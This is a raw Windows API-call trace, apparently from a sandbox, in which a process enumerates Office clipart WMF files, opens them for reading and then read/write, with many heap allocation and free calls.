[0103.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0103.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0103.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.292] AreFileApisANSI () returned 1 [0103.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0103.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.293] AreFileApisANSI () returned 1 [0103.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0103.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 69 [0103.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.293] GetFileType (hFile=0x33c) returned 0x1 [0103.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.293] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.293] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.294] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.294] CloseHandle (hObject=0x33c) returned 1 [0103.294] AreFileApisANSI () returned 1 [0103.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0103.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 69 [0103.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.294] GetFileType (hFile=0x33c) returned 0x1 [0103.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0103.294] CloseHandle (hObject=0x33c) returned 1 [0103.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.296] AreFileApisANSI () returned 1 [0103.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 69 [0103.296] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31f4)) returned 1 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0103.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.296] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc20, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00200_.WMF", cAlternateFileName="")) returned 1 [0103.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0103.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.297] AreFileApisANSI () returned 1 [0103.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0103.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.298] AreFileApisANSI () returned 1 [0103.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0103.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 69 [0103.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.298] GetFileType (hFile=0x33c) returned 0x1 [0103.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.298] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.298] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.299] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.299] CloseHandle (hObject=0x33c) returned 1 [0103.299] AreFileApisANSI () returned 1 [0103.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0103.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 69 [0103.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.299] GetFileType (hFile=0x33c) returned 0x1 [0103.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0103.299] CloseHandle (hObject=0x33c) returned 1 [0103.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.301] AreFileApisANSI () returned 1 [0103.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 